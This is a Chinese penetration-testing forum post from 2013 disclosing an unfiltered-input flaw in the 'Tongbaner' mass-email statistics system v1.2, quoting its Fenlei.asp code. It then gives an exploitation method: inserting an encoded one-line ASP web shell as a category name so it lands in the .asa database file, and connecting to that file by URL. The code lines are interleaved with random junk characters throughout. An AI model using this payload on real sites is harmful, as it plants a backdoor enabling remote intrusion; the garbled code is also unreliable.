中国网络渗透测试联盟

标题: 铜板儿网邮件群发统计系统 v1.2 漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:14
标题: 铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp + u( D. T" j* Q. O3 Y! t2 q
/ \7 L7 T9 G% Y8 [
IF Request.QueryString("Action")="del" Then 0 p$ W) b9 ~; j6 ?! d
ID=Request.QueryString("ID") $ V) \, L! F% o% l7 D5 r
IF Countss ("tui","Fenlei",ID )<>0 then
4 e. p, I2 s! D0 l8 Y  Y'略 ! |$ O: w! _2 s( D, A4 a/ V
IF Request.QueryString("Action")="Add" Then
0 q4 ~7 T8 _7 }+ Z8 r) o, C) [Tname=Request.Form("Typename") / }% X: M3 G: _5 q
Set Rs=Server.CreateObject("adodb.Recordset") * u0 U! g" [+ M2 Y) i6 V# x
Sql="Select * From Fenlei Order by id Desc " 9 {8 K' r  U, Z$ C
Rs.Open Sql,Conn,1,3
  |. n9 H% G1 ZRs.Addnew
* W* m; K' W) {0 |Rs("Typename")=Tname ' ~1 w. H. G. r, G
'略
* P# j/ A0 a: HSet Rs=Server.CreateObject("adodb.Recordset") # p" g5 i2 A) Q  }
Sql="Select * From Fenlei Order by id Desc "
+ v3 @! D- P; e0 o4 V+ ZRs.Open Sql,Conn,1,1
: f/ p: F3 k5 k5 n, \'略 # y# Z7 \3 q6 ?8 l
%>! e3 C0 D, O1 V' x# ]" S5 N
; p! K7 Y6 q/ j' e' Q& L4 o" K
$ a% q2 X( \0 Z, M$ o5 T

/ Q6 c& t2 L5 o2 ~1 v没有过滤,直接写入数据库。4 }) B) C9 A0 ~1 q# S) P+ r3 ~
. h# C& ?5 T; q& [7 ?# I/ L
利用方法:1 H1 s' L( ~* A4 i

% X8 r% f) b  n( _插入:┼攠數畣整爠煥敵瑳∨≡┩>3 X+ s2 ^8 n8 j! M2 B/ i
: R' Q6 P+ o- _

$ n( U0 U4 h+ C3 k* |连接: http://www.xxx.com/###tongbaner.asa 6 X: j& e$ a8 r6 g5 x  b
'默认安装文件:
) g( Z) ?3 V. B9 N& u& H1 G'install.asp2 ~( \. s: H2 m! P  }




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2